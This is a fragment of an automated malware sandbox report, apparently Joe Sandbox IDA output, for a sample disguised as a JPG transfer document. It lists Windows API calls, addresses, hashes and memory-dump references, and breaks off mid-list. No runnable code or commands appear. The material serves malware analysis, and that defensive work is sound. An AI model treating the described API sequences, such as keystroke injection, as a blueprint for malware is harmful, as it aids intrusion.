                                                                                                          • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                          • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2354583917-0
                                                                                                          • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                          • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                          • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                          • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                          APIs
                                                                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                          • String ID: #v
                                                                                                          • API String ID: 2449869053-554117064
                                                                                                          • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                          • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                          • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                          • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                          • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                          • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                          • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                          APIs
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 896007046-0
                                                                                                          • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                          • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                          • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                          • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                          • GetFocus.USER32 ref: 00448ACF
                                                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3429747543-0
                                                                                                          • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                          • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                          • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                          • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                            • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                            • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                          • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                          • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3300667738-0
                                                                                                          • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                          • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                          • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                          • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                          • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                          • String ID: %lu$\VH
                                                                                                          • API String ID: 3164766367-2432546070
                                                                                                          • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                          • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                          • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                          • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: Msctls_Progress32
                                                                                                          • API String ID: 3850602802-3636473452
                                                                                                          • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                          • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                          • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                          • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                          • String ID:
                                                                                                          • API String ID: 3985565216-0
                                                                                                          • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                          • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                                          • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                          • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 0041F707
                                                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                          • _free.LIBCMT ref: 0041F71A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_free_malloc
                                                                                                          • String ID: [B
                                                                                                          • API String ID: 1020059152-632041663
                                                                                                          • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                                                          • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                          • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                                                          • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                          APIs
                                                                                                            • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                            • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1957940570-0
                                                                                                          • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                          • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                          • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                          • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                          APIs
                                                                                                          • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                          • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                          • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 3220332590-0
                                                                                                          • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                          • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                          • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                          • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove_strncmp
                                                                                                          • String ID: >$U$\
                                                                                                          • API String ID: 2666721431-237099441
                                                                                                          • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                          • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                          • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                          • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                          • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                          • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                          • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
